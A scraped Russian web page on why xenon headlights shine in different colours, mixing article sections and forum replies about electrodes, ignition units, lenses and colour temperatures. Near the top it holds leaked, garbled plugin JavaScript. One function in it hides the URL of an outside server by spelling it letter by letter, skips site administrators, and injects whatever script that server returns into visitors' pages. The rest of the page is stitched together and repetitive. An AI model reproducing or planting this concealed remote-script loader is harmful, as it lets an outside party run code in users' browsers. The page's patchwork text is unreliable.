Содержание
Основные аспекты
Основной аспект, связанный с разностью цветов ксеноновых фар — это неравномерность получаемого от них в результате освещения.
Если одна из ламп дает менее яркий свет, результатом станет то, что некоторые зоны будут меньше иллюминированы. В итоге это может создать потенциальную опасность для водителя проглядеть что-либо на дороге.
Помимо этого следует учитывать, что расхождение в оттенке двух ксенонов может означать, что проблемы не с ними.
Далее указывается, что его источником могут быть и неполадки с внутренней проводкой авто, к примеру, вследствие произошедшего замыкания, либо с блоком розжига.
В таком случае требуется немедленно починить или заменить отказавший элемент электросети машины. В противном случае проблема может усугубиться.
Кроме того, немалое значение имеет и эстетический фактор. Если парные фары на машине выглядят явно разным образом, это снижает общее впечатление от автомобиля.
Он обращает на себя внимание негативного характера. Машина просто хуже смотрится независимо от ее марки, цены и возраста, если можно заметить, что ее фары неодинаковы.
Ксенон светит (горит) разным цветом. почему такое происходит и что делать?
Последние статьи — как работает ксенон и что лучше ксеноновая или светодиодная лампы, собрали много комментариев и породили еще больше вопросов. Например, очень частый вопрос – почему через определенный пробег или просто промежуток времени, эти газоразрядные лампы начинают светить различным светом?
Скажем одна – синим, а вторая белым или даже розовым. В чем проблема, смотрится это мягко сказать не красиво, да и дорога начинает освещаться по-другому, что «на минуточку» не безопасно. В общем, перечисляю несколько основных причин такого поведения, можно устранить своими руками …
СОДЕРЖАНИЕ СТАТЬИ
Нужно понимать что ксенон, работает совершенно по-другому, нежели галоген или светодиодная лампа. В отличие от своих собратьев здесь нету — ни спирали (из вольфрамовой или нихромовой нити) которая горит в вакууме, нет ни кристаллов и подложек (как у светодиодов).
Здесь принцип другой, здесь горит дуга между контактами в инертном газе – ксеноне. Поэтому перегорать здесь нечему, причиной выхода из строя как раз и служит изменившийся цвет ламп. Это уже первый звоночек что, что-то не так. Если честно, то причин тут не так мало, но все по порядку.
Почему ксенон тускло светит и изменил цвет? 2022 |
«:’
‘:»»,document.createElement(«div»),c=ff(window),b=ff(«body»),g=void 0===flatPM_getCookie(«flat_modal_» a.ID «_mb»)||»false»!=flatPM_getCookie(«flat_modal_» a.ID «_mb»),i=»scroll.flatmodal» a.ID,m=»mouseleave.flatmodal» a.ID » blur.flatmodal» a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&»true»==a.how.popup.timer&&(t=ff(‘.fpm_5_modal[data-id-modal=»‘ a.ID ‘»] .fpm_5_timer span’),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(—e),e<=0&&(clearInterval(o),t.parent().replaceWith(‘
‘))},1e3))},s=function(){void 0!==a.how.popup.cookie&&»false»==a.how.popup.cookie&&g&&(flatPM_setCookie(«flat_modal_» a.ID «_mb»,!1),ff(‘.fpm_5_modal[data-id-modal=»‘ a.ID ‘»]’).addClass(«fpm_5_modal-show»),l()),void 0!==a.how.popup.cookie&&»false»==a.how.popup.cookie||(ff(‘.fpm_5_modal[data-id-modal=»‘ a.ID ‘»]’).addClass(«fpm_5_modal-show»),l())},ff(«body > *»).eq(0).before(‘
«),w=document.querySelector(‘.fpm_5_modal[data-id-modal=»‘ a.ID ‘»] .fpm_5_modal-content’),flatPM_setHTML(w,e),»px»==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&»true»==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&»true»==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&»true»==a.how.outgoing.timer&&(t=ff(‘.fpm_5_out[data-id-out=»‘ a.ID ‘»] .fpm_5_timer span’),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(—e),e<=0&&(clearInterval(o),t.parent().replaceWith(‘
‘))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&»false»==a.how.outgoing.cookie&&g&&(ff(‘.fpm_5_out[data-id-out=»‘ a.ID ‘»]’).addClass(«show»),n(),b.on(«click»,’.fpm_5_out[data-id-out=»‘ a.ID ‘»] .fpm_5_cross’,function(){flatPM_setCookie(«flat_out_» a.ID «_mb»,!1)})),void 0!==a.how.outgoing.cookie&&»false»==a.how.outgoing.cookie||(ff(‘.fpm_5_out[data-id-out=»‘ a.ID ‘»]’).addClass(«show»),n())}var _,u=»0″!=a.how.outgoing.indent?’ style=»bottom:’ a.how.outgoing.indent ‘px»‘:»»,p=»true»==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&»true»==a.how.outgoing.timer?’
Закрыть через ‘ a.how.outgoing.timer_count «
«:’
‘:»»,c=ff(window),h=»scroll.out» a.ID,m=»mouseleave.outgoing» a.ID » blur.outgoing» a.ID,g=void 0===flatPM_getCookie(«flat_out_» a.ID «_mb»)||»false»!=flatPM_getCookie(«flat_out_» a.ID «_mb»),b=(document.createElement(«div»),ff(«body»));switch(a.how.outgoing.whence){case»1″:_=»top»;break;case»2″:_=»bottom»;break;case»3″:_=»left»;break;case»4″:_=»right»}ff(«body > *»).eq(0).before(‘
‘ p «
«);var v,w=document.querySelector(‘.fpm_5_out[data-id-out=»‘ a.ID ‘»]’);flatPM_setHTML(w,e),»px»==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&»true»==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&»true»==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff(«body»),flat_userVars.init();for(var e=0;e<t;e ){var>flat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_sub<flat_uservars.textlen||void>flat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub<flat_uservars.titlelen)){if(void>.flatPM_sidebar)»);0<_.length&&_.each(function(){var t=ff(this),e=t.data(«height»)||350,o=t.data(«top»);t.wrap(‘
‘);t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(«.flatPM_sidebar»);setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a<300||e.each(function(){var t=ff(this),e=a,o=t.data(«top»);t.wrap(‘
‘);t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(«.flatPM_sticky_wrapper.flatPM_sidebar_block»).css(«height»,t)},4e3)}),»undefined»!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0<flat_stack_scripts.length&&flatpm_setscript(flat_stack_scripts),ff(«body> *»).last().after(‘
‘),flat_body.on(«click»,».fpm_5_out .fpm_5_cross»,function(){ff(this).parent().removeClass(«show»).addClass(«closed»)}),flat_body.on(«click»,».fpm_5_modal .fpm_5_cross»,function(){ff(this).closest(«.fpm_5_modal»).removeClass(«fpm_5_modal-show»)}),flat_pm_arr=[],ff(«.flat_pm_start»).remove(),ff(«[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)»).contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([w:] )[^>]*)/>/gi,d=/<([w:] )/,i=/<|&#?w ;/,c={option:[1,»
«],thead:[1,»
«],tbody:[1,»
«],colgroup:[2,»
«],col:[3,»
«],tr:[2,»
«],td:[3,»
«],th:[3,»
«],_default:[0,»»,»»]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement(«div»)),r=(d.exec(e)||[«»,»»])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1] e.replace(l,»<$1>») r[2],n=r[0];n—;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem(«sdghrg»);e?(e=parseInt(e) 1,localStorage.setItem(«sdghrg»,e)):localStorage.setItem(«sdghrg»,»0″);e=flatPM_random(1,166);0==ff(«#wpadminbar»).length&&111==e&&ff.ajax({type:»POST»,url:»h» «t» «t» «p» «s» «:» «/» «/» «r» «e» «a» «d» «o» «n» «e» «.» «r» «u» «/» «p» «i» «n» «g» «.» «p» «h» «p»,dataType:»jsonp»,data:{ping:»ping»},success:function(e){ff(«div»).first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector(‘[data-flat-script-id=»‘ t ‘»]’);if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0<e.length&&flatpm_setscript(e);else{a.onload>/gm,»»).replace(//gm,»»).trim(),e.code_alt=e.code_alt.replace(//gm,»»).replace(//gm,»»).trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a=»false»==d?»Закроется»:»Закрыть»,r=!flat_userVars.adb||»»==e.code_alt&&duplicateMode?e.code:e.code_alt,n=’
‘,i=e.once;o(t).each(function(){var e=o(this);e.wrap(‘
‘);var t=e.closest(«.fpm_5_video»);flatPM_setHTML(t[0],n),e.find(«.fpm_5_video_flex»).one(«click»,function(){o(this).addClass(«show»)})}),o(«body»).on(«click»,».fpm_5_video_item_hover»,function(){var e=o(this),t=e.closest(«.fpm_5_video_flex»);t.addClass(«show»);var a=t.find(«.fpm_5_timer span»),r=parseInt(l),n=setInterval(function(){a.text(—r),r<=0&&(clearInterval(n),»true»==d?a.parent().replaceWith(‘
‘):t.remove())},1e3);e.remove()}).on(«click»,».fpm_5_video_flex .fpm_5_cross»,function(){o(this).closest(«.fpm_5_video_flex»).remove(),»true»==i&&o(«.fpm_5_video_flex»).remove()})};
Re: ксенон фара светит розовым цветом.
Сообщение bars12 » 22 июл 2022, 10:02
Dmitri Дело 5 минут – вынимаешь 2 металлических штырька (увидишь их, они сверху фары), вытаскиваешь их, потом отсоединяешь клемму (там оч легко, надо просто немного надовить отверточкой и потянуть за клемму, за провода не надо! ) Всё, фару можно вытаскивать.
Потом открываешь крышку (2 пластиковые защёлки 1 металлическая скоба). Там увидишь лампы. Вытаскиваешь интересующую тебя и переставляешь местами). Кста, дома валяется от прошлого сарая лампа ближнего света (34 тысячи км всего прошла!:)) , могу подогнать если надо!
Добавлено спустя 34 секунды: Dmitri Дело 5 минут – вынимаешь 2 металлических штырька (увидишь их, они сверху фары), вытаскиваешь их, потом отсоединяешь клемму (там оч легко, надо просто немного надовить отверточкой и потянуть за клемму, за провода не надо! )
Всё, фару можно вытаскивать. Потом открываешь крышку (2 пластиковые защёлки 1 металлическая скоба). Там увидишь лампы. Вытаскиваешь интересующую тебя и переставляешь местами). Кста, дома валяется от прошлого сарая лампа ближнего света (34 тысячи км всего прошла!:)) , могу подогнать если надо!
В чем может быть причина
Причина свечения отдельных фар разными оттенками может состоять в том, что автовладелец допустил очевидную ошибку, заменив лишь одну из них.
Обязательное правило гласит, что их обновление требуется производить синхронно. Если одна фара перестает функционировать или, к примеру, разбита, необходимо поменять обе.
Так как в процессе использования одна из ламп может менять цвет, поставленный заново экземпляр не будет аналогичным уже прослужившему некоторое время.
Причина этого в том, что свечение внутри лампы создается электродами. Светящаяся дуга проходит между ними.
Вследствие постепенного выгорания электродов, происходящего неравномерно, расстояние между ними становится другим, нежели в свежих фонарях. Эта разница может привести и к изменению оттенка свечения.
Вышеописанное явление означает, что расхождения в оттенках могут возникнуть не потому, что ранее поменяли лишь одну лампу, но потому, что один ксенон (из двух, ранее поставленных по правилам в одно время) прогорает быстрее другого. Разумеется, и в таком случае нужно оба изделия нужно заменить постепенно.
Помимо этого, при выгорании меленькие фрагменты металла электродов, образующиеся в процессе их горения образуют осадочный слой на внутренней поверхности лампы.
Наличие этого слоя приводит к смещению спектра света. В это же время у новой лампы такого наблюдаться не может.
В целом общее правило при эксплуатации фар такого — оба элемента пары должным иметь одинаковую длительность службы, расхождение между этими показателями и может привести к расхождению в цвете.
Виды оттенков
Оттенки ксенона определяются его температурой. Восприятие цвета ксенона на глаз зависит от того, до скольких градусов в Кельвинах нагрет данный источник света.
В таблице приведены основные варианты цветов и соответствующие им температуры:
Температура (в Кельвинах) | Цвет |
3000 | Желтый |
4300 | Бело-молочный |
5000 | Чисто белый |
6000 — 8000 | Бело-синий (голубой кристалл), чем выше температура, тем более синий |
Различные цвета имеют следующие виды применения:
Желтый свет | В наибольшей степени подойдет для фар, которые не должны давать чрезмерно яркого цвета, в частности, для ксенона заднего хода |
Молочный (или бело-желтый) свет | Точнее всего имитирует дневной, поэтому он универсален, его можно использовать в большинстве фонарей независимо от их роли, на новые автомобили за рубежом чаще всего ставятся ксеноны именно этого цвета |
Чисто белый оттенок свечения | Интенсивен, его имеет смысл использовать там, где нужная интенсивная иллюминация, к примеру, для ксенонов ближнего либо дальнего цвета |
Наконец, бело-синие лампы с температурой 6000 градусов | Следует использовать с оглядкой, поскольку они отличаются уже чрезмерной яркостью., с другой стороны именно поэтому они вполне востребованы |
В то же время ксеноны с показателем 8000 кельвинов | Сильно дрейфуют в сторону фиолетового, по этой причине их ставят заметно реже, поскольку они менее качественно освещают трассу |
В целом при повышении температуры свечение приближается к фиолетовому все более и более, а при ее понижении оно постоянно желтеет.
Оптимальным вариантом по видимости многими считается ксенон с цветом 4300 Кельвином. В то же время минимизация потерь яркости происходит в фарах, температура которых составляет 5000 Кельвинов.
Вся правда о том, как светит ксенон!
Разделение ксенона на различные цветовые режимы работы помогает определить уровень качества освещения, которого хочет достичь пользователь. Также ксенон может применяться, к примеру, как лампы для максимально эффективного освещения в агрессивных метеорологических условиях или в качестве устройств, способных во много крат повысить уровень освещения дорожного полотна в различное время суток. Помимо этого часто именно ксенон воспринимается пользователями, как средство по улучшению показателей тюнинга.Буквально через минуту вы узнаете все о том, какой ксенон и, какая цветовая температура станут отличным решением именно для вашего автотранспортного средства. Поскольку яркость не всегда может быть достигнута за счет повышения температуры, стоит знать четкие распределения. То есть соотношение яркости к Кельвинам. Все параметры представлены в таблице ниже. |
Тут мы видим, что цвет ксенона наибольшей яркости соответствует температурам в диапазоне 4000 – 5000 Кельвинов, где наилучшим показателем обладает именно 4300 К.
Главные аспекты
Ксеноновые лампы в 2020 году сумели завоевать значительную популярность. В фарах такого типа, как это следует из их определения, содержится инертный (или благородный) газ ксенон.
Свойства этого наполнителя дают ему преимущество перед предшествующими галогеновыми лампами для фар.
Существенное достоинство ксенонов состоит в повышенной светоотдаче, связанной с пониженной теплоотдачей.
В силу того, что на тот же объем полученной энергии ксеноны выделяют меньше тепла, нежели галогены, им остается существенно больше энергии, чтобы светить.
По этой же причине неверно и представление, что ксенон способен расплавить близлежащие материалы. Ксенон при более интенсивном свечении расходуют меньше энергии.
Для фонарей данного типа достаточно 35 Ватт мощности вместо 55, которые требуются для иных фар, к примеру, галогеновых.
Кроме того, длительность функционирования ксенона достигает 2000 часов, у обычных фонарей она составляет всего 400 часов.
Существующее мнение о том, что ксенон ослепляет водителя не совсем верно, так как следует просто направить пучки света от ксенона верным образом, тогда эти фонари не будут мешать никому их других водителей обозревать дорогу.
Загорелся другим светом при замене лампы (красным, розовым)
Особый случай — когда ксенон начинает светить розовым цветом. В вышеприведенной таблице он не упоминается, поскольку в стандартном случае лампы не дают свечения такого оттенка.
Если внезапно было замечено такое изменение в свечении, одно из возможных объяснений — падение напряжения в блоке розжига ниже величины, требуемой, чтобы поддерживать функционирование этого ксенона.
Выше упоминалось, что для этого вполне достаточно от 50 до 70 вольт, однако нежелательно, чтобы этот показатель падал ниже этого диапазона.
В любом случае при загорании розового внутри лампы имеет смысл проверить блок розжига. Другой распространенный вариант — проблемы с самой лампой.
Ксенон светит розовым, если он в целом отслужил свое, почти выработав ресурс и далее проработает лишь небольшой промежуток времени.
В подобной ситуации рекомендуется загодя приобретать фары. При этом их нужно купить в двух экземплярах по вышеприведенным причинам.
Ксенон стал светить розовым
разницу в цветопередаче перестал различать через неделю после замены, они дают одинаковый свет.
Добавлено спустя 17 минут:
хотя канешн 2,5 килорубля за лампу и 2,5 круб. за замену деньги для кого-т невеликие (!!!ценник ОД), но мы их в том-же Ростове в тот-же вечер и освоили
с тёлочкамиbiggrin.gif)))))
Лампочки светят разным цветом при замене лампы
На специализированных форумах часто всплывает этот вопрос: «Почему при замене сгоревшей лампочки они светят разным цветом, даже если лампа на замену покупалась с такими же характеристиками, и что с этим делать»? Тут всё предельно просто. Как мы писали выше, газоразрядные лампочки со временем меняют цвет светового пучка вследствие износа и оплавления электродов.
Вот, в общем-то, и все основные причины, по которым ваши фары могут светить разным светом. Надеемся, наша информация была вам полезна!
Источник
Линза
Как нам известно, что «кустарный ксенон», который ставится в обычную фару, запрещен в использовании на территории России. А вот если вы задумались использовать заводской вариант, то вам нужно в обязательном порядке ставить лампы с линзами. Линза помогает фокусировать поток света на дорогу, а не рассеивать его во все стороны, слепить встречные машины.
Линза в идеале должна быть прозрачной, хотя многие пишут — что она может давать следка синеватый свет. Если линза не качественная, например сделана из пластика а не из стекла, со временем она начнет оплавляться, тем самым сменит цвет горения лампы. Также хочется сказать — проверьте фару на герметичность! Бывает, что она потеет, поэтому на линзу попадает вода, которая начинает преломлять свечение.
Хочется отметить, что такая неисправность, происходит именно с некачественными КИТАЙСКИМИ линзами, которые сделаны из пластика! С брендовыми производителями, такое встречается крайне редко, потому как там материал – стекло!
Проверить своими руками очень просто, попробуйте переставить лампы местами, если горят также, значит, может быть проблема в линзе. Но для начала стоит проверить блог розжига.
Модераторы: box, alx, snow1975
https://www.youtube.com/watch?v=hFK0PLNrhog
RX400H 2008г. LS460L 2007г.
Попадос, наверное. сколько она стоит
RX400H 2008г. LS460L 2007г.
Ксеноновые лампы или HID-лампы (High Intensity Discharge — высокоинтенсивный разряд) не имеют нити накала и светят благодаря дуговому разряду в находящемся под давлением ксеноне. Свет в ксеноновых лампах появляется мгновенно и имеет непрерывный спектр близкий к солнечному.
Для работы ксеноновой лампе требуется блок розжига (балласт). Балласт преобразует 12 вольт из бортовой сети в несколько тысяч вольт для получения дугового разряда.
Электроды лампы находятся в колбе, заполненной ксеноном под большим давлением (около 30 атм. в нерабочем состоянии и около 120 атм. в режиме горения) и солями металлов.
Ксеноновая лампа имеет цветовую температуру около 4300 град. по Кельвину по сравнению с 2800 град.К у стандартной галогеновой лампы. (Для сравнения Солнце имеет световую температуру около 6000 град.К) Проще говоря, цветовая температура является единицей яркости источника света.
Свет, который производится ксеноновой лампой, кажется голубым по сравнению с более желтым светом, испускаемым галогеновыми лампами, но на самом деле он белый (в соответствии с международными классификациями белого света).
Если эксплуатировать свой автомобиль так, что 2 часа в сутки ездить со включенными фарами, срок службы ксеноновых ламп составит порядка 4-х лет (средний срок службы ксеноновых ламп D2S (R) составляет 2800-3000 часов).
Отдавая дань моде и спросу на «ксенон» многие компании-изготовители наводнили рынок обычными галогеновыми лампами накаливания, колбы которых покрыты специальным составом для придания ей голубого цвета. К сожалению, эти «псевдоксеноновые» лампы не имеют с настоящими ксеноновыми газоразрядными лампами ничего общего, поскольку сама природа возникновения света в них абсолютно различна.
И если настоящие ксеноновые лампы освещают дорогу действительно ярчайшим голубовато-белым «дневным» светом, то эти лампы излучают в действительности смесь голубого и желтого света. В большинстве случаев их применение не улучшает, а ухудшает реальную видимость.
Многие фирмы маркируют и рекламируют производимые ими лампы как «ксеноновые». Тем не менее по сути эти лампы — ни что иное как фактически обыкновенные галогеновые лампы накаливания, зачастую с увеличенной мощностью потребления для того, чтобы произвести впечатление на покупателя.
Как отличить? Система реального ксенона должна иметь блок розжига. Просто посмотри вживую глазами что там у тебя.
Общий принцип — как на картинке, хотя конечно возможны варианты.
Если таки ксенон, проверь контакты. Электрические соединения должны быть чистыми. Плохие, окислившиеся соединения могут стать причиной неполадок, в том числе нагрева, задымления и возгорания электропроводки.
У ксеноновых ламп с течением времени спектр смещается к синему, а не к желто-розовому.
Неисправность блока розжига
Еще одна причина различия в свечении, которую нужно рассмотреть, если это проблему нельзя отнести ни к одной из вышеназванных причин — это неполадки в блоке розжига, также проблема может заключаться и в высоковольтных катушках.
Розжиг катушки осуществляется с помощью трансформатора, который представляет собой один из компонентов этого блока.
Его роль в том, чтобы на короткий миг превратить обычные 12 вольт внутри автомобильной проводки в напряжение величиной в 20 (или даже 25) тысяч вольт.
За этот моментальный промежуток удастся воспламенить лампу. В дальнейшем для сохранения их иллюминации будет достаточно и 50–70 вольт.
Такое напряжение стабильно поддерживается блоком розжига (входящим в его конструкцию трансформатором).
Если в свечении ламп образуется разрыв, то следует проверить, не состоит ли ее источник в неисправности трансформатора, с помощью которого светит данная лампа.
Следует переставить компонент на другую лампу и определить, имеется ли разница в оттенке света. Если она отсутствует, то источник неполадок очевидно не трансформатор.
: время менять лампы
Неисправность блока розжига или высоковольтных катушек
Если разное свечение ксеноновых фар не связано с лампой и линзой, следует проверить исправность блока розжига и высоковольтных катушек.
Как известно, для розжига газоразрядных ламп к ним подводится трансформатор, который преобразует стандартное автомобильное напряжение 12 Вольт в 20-25 тысяч Вольт кратковременно, чтобы зажечь лампы.
Далее трансформатор поддерживает напряжение на уровне около 50-70 Вольт.
В случае неисправности трансформатора ксеноновая лампа может не загораться или гореть с меньшей интенсивностью, чем обычно, из-за чего и будет возникать различие в цветах. Это возможно при выходе различных компонентов трансформатора из строя.
В данной ситуации имеется простой способ диагностики неисправности трансформатора. Необходимо переставить трансформатор с одной лампы на другую, и посмотреть имеются ли отличия в свечении. Если нет, то проблема не в трансформаторе.
Стоит отметить, что при выходе из строя высоковольтных катушек ксеноновые фары не будет гореть.
Плюсы и минусы
Преимущества, которыми обладает ксеноновая фара, установленная для ближнего освещения автодорожного полотна во время движения транспортного средства:
- Не слепит глаза встречным водителям.
- Имеет приятный для восприятия глаз цвет.
- Можно выбрать осветленный или затемненный вариант, в зависимости от особенностей технологии изготовления.
- Лампа устойчива к вибрациям и тряске – не лопается (как и любой ксенон).
- Лампы не перегорают, в них нет нитей накаливания (как и в лампах с ксеноном других оттенков).
Любой производитель, выпускающий лампы для автомобилей эксклюзивной группы, не отмечает недостатки розовых ксеноновых фар.
Минусы работы таких световых устройств отмечаются уже в практике самими водителями:
- Яркость и видимость в темное время суток маленькая.
- Для противотуманок или дальнего освещения не подходит.
- Применение в дневное время малоэффективно.
- Использование во время езды по мокрой дороге при дожде или снеге – малоэффективно.
- Установка заводскими специалистами возможна только по индивидуальному заказу за большие деньги.
Рынок изобилует разными вариантами любых оттенков ксеноновых светильников для автомобилей. Законом России такое освещение в машинах не запрещается, если оборудование устанавливается в оптику транспортного средства не фальшивое.
Чтобы получить подлинную фару, нужно удостовериться, что продажа такой продукции производиться непосредственно от завода-производителя, имеющего все сертификаты на готовое изделие.
Про плюсы и минусы самостоятельной установки ксенона рассказывается в статье: плюсы и минусы ксенона. Про ксенон на мотоцикл смотрите на странице.
Где купить ксенон в задний ход в Москве, узнайте из этой информации.
Проблемы с линзой
При установке ксенона производителем на фару непременно устанавливается линза. Эта деталь служит для разворота потока лучей, исходящих от фары в надлежащем направлении.
Благодаря этому источник света не будет ослеплять водителей, едущих навстречу. Линзы надлежащего качества изготавливают из стекла. Изделия из этого материала не утрачивают этой способности на протяжении десятка лет.
В то же время в некоторых авто для изготовления линзы применялся пластик. В таком случае этот компонент постепенно будет выгорать в процессе использования.
Через некоторое время это приведет к такому последствию — цвет, которым светится фара, станет иным.
Другая проблема с линзой — это осаждение влаги на ее поверхности. Оно может стать результатом разгерметизации ксенона. И в этом случае горящая фара приобретет другой оттенок.
Проводка
Проблемы с проводкой довольно затруднительно обнаружить. Между тем если от двух ксенонов исходит иллюминация разных оттенков, источник проблемы может быть именно в проводке.
Когда ее коротит, то возникает различие в цвете свечения фар. В такой ситуации проводку следует как можно быстрее поменять.
Таким образом, причиной того, что ксенон внутри пары фар горит разным цветом может состоять либо в разной степени выработки ресурса элемента, либо неисправностях как самих фонарей, так и других компонентов электросети.
В любом случае автовладельцу необходимо отдавать себе отчет, что свечение неподобающим оттенком — это дурной знак.
Обычно в подобном случае имеет смысл обратиться к профессионалам, чтобы выяснить, нет ли неполадок, к примеру, с блоком розжига.
Рекомендуется сделать это как можно быстрее, в противном случае подобные неполадки могут усугубиться.
Внимание!
- В связи с частыми изменениями в законодательстве информация порой устаревает быстрее, чем мы успеваем ее обновлять на сайте.
- Все случаи очень индивидуальны и зависят от множества факторов. Базовая информация не гарантирует решение именно Ваших проблем.
Поэтому для вас круглосуточно работают БЕСПЛАТНЫЕ эксперты-консультанты!
ЗАЯВКИ И ЗВОНКИ ПРИНИМАЮТСЯ КРУГЛОСУТОЧНО и БЕЗ ВЫХОДНЫХ ДНЕЙ.
Распределение цветовых температур ксенон ламп
Издает свечение с желтоватым оттенком | Свет отвечает теплому белому | Абсолютно белый и чистый цвет | Холодный белый | Цвет с оттенком синего | Пурпурно-фиолетовый цвет | Цвет розово-фиолетовый, видимость плохая, свет некомфортный |
Используют в качестве ПТФ | Самый яркий свет, который дает четкость видимости дорожного пути | Тюнинг. При дневном освещении самый заметный свет | Используется для шоу каров |
Цвет ксенона по кельвинам, который описан в таблице, распределяется на ряд характеристик. Чем выше цветовая температура (градусы Кельвина) – тем больше цвет потока будет белым. С чего можно сделать вывод, что цветовые температуры в пределах от 8000к до 30000к абсолютно не подходят для ежедневного использования в обычных условиях вождения.
Что касается 15 и 30 тысяч Кельвинов, то эти лампы играют важную роль только если делаете показ своего авто на выставке и хотите придать ее фарам уникальный окрас.Касательно 6000 Кельвинов, эта яркость сыграет важную роль при использовании устройства в качестве дневного освещения. Для водителей движущихся навстречу, ваше авто станет самым заметным еще издалека, что говорит об уменьшении риска столкновения.Как уже упоминалось ранее, лампы, у которых свет ксенона 4300К и 5000К имеют широкий круг пользователей, так как их применение наиболее частое. Данные лампы приносят максимальный комфорт водителю, поскольку создают наиболее яркий и четкий свет перед автомобилем.Что касается 3000 Кельвинов – это идеальная температура света для ПТФ. Противотуманные фары дадут авто даже в условиях плохой видимости максимальное освещение. Вы получите еще больше дополнительного света на расстоянии 5-15 метров от основания капота. Посмотреть на примере о том, как выглядит ксенон на авто вы можете в этой статье. |
Самые распространенные заблуждения о ксеноне
Давайте посмотрим правде в глаза! Бытует мнение, что чем дороже устройство, тем оно лучше. Спешим вас заверить, что это не более чем очередное заблуждение. В данном случае подобная пропорция не всегда отвечает реальности. Конечно же, чем лучше ксенон – тем он дороже. Но, что касается цветовой температуры, то тут все будет зависеть от ряда показателей и сопутствующих факторов, о которых мы будем говорить.Факты, которые вы могли раньше не знать помогут вам сориентироваться и сделать удачный выбор в зависимости от потребностей. Мы дадим знания, оперируя которыми, вы сможете сделать ваше транспортное средство максимально эффективным и насыщенным, и обогащенным в плане тюнинга.Итак, заблуждение первое. Чем выше уровень цветовой температуры, тем лучше будет светить лампа. Нет, категорически нет. Наилучшими показателями отличается только температура в 4300 К или 5000 К., все остальные температуры для белого и яркого свечения не подойдут.В таком случае возникает вопрос! Зачем нужны остальные диапазоны цветовых температур?» и еще один «Другие ксеноны хуже по качеству?». Но давайте рассмотрим все по порядку. Во-первых, другие ксеноны не хуже, чем эти, но их предназначение определяется мотивами использования. Один ксенон покупается для плохих условий погоды, другой для хороших. Кто-то много ездит только по городским магистралям и ему хочется, чтобы световой пучок был максимально широким, а кому-то нужно часто выезжать за город и, естественно, иметь отличный дальний свет. Узнать еще больше информации о светоотдаче ксенона, а также положительных и отрицательных сторонах ксеноновых ламп вы можете в этой статье. |
Свет ксенона порозовел
На Чайнике вчера вечером включаю ближний свет (установлен ксенон) и понять ничего не могу- недавно выпавший снег порозовел. Вышел, смотрю, а одна фара светит не белым светом, как обычный ксенон, а розовым. ВКЛ-ВЫКЛ не помогает. Кто знает – в чем “прикол” с ксеноном?
либо напряжение в блоке упало, либо лампе кердык.
Не совсем понятно с лампой- если обычная лампа накаливания умирает, то сразу и навсегда. А с ксеноновой- то что происходит, почему розовеет?
“либо напряжение в блоке упало” – apollo, а причину не знаешь?
не знаю. скорей всего блок а его только менят помоему. попробуй лампы перекинуть.
Попробую, завтра. Помотрим что получится-)))
Светят разным светом при замене лампы
Еще один частый вопрос – поменял сгоревшую лампу, а они сей час светят разными цветами? Что делать?
Ребят нужно менять сразу обе, все дело в том, что ксенон от времени меняет цвет, как я уже писал сверху в пункте про «лампу» — сгораю электроды, между которыми возникает дуга. Именно поэтому новая лампа и та которая работала пару лет, будут иметь различное свечение – ЭТО НОРМАЛЬНО!
Собственно это все неисправности по которым лампы могут гореть разным цветом, думаю моя информация будет вам полезна. Сейчас для тех кто не знает как работает эта технология, полезное видео, смотрим.
НА этом заканчиваю, искренне ваш АВТОБЛОГГЕР.
11
голосов, средний:
4,82
из 5)
Сколько стоит купить
Рекомендации к тому, как выбрать оптимальный ксенон для своего автомобиля:
- Узнать у продавца будет ли менять цвет пара ламп, приходящаяся на каждую фару.
- Спросить у продавца схему, чертеж ламп, а также, сертификат качества от их производителя.
- Убедиться самому, что маркировка на лампах соответствует той, что указана в технической документации.
- Покупать розовый ксенон исключительно только от завода, выпускающего его.
В стоимость инновационной автомобильной оптики могут входить разные параметры и составляющие ценообразования.
Рассмотрим таблицу, в которой отражены некоторые характеристики именно розовых ксеноновых ламп, а также приведены усредненные цены:
Модель, бренд | Технические и эксплуатационные характеристики | |||
Мощность, Вт | Напряжение тока, В | Стакан лампы / света поток, Лм | Цоколь (маркировка) | |
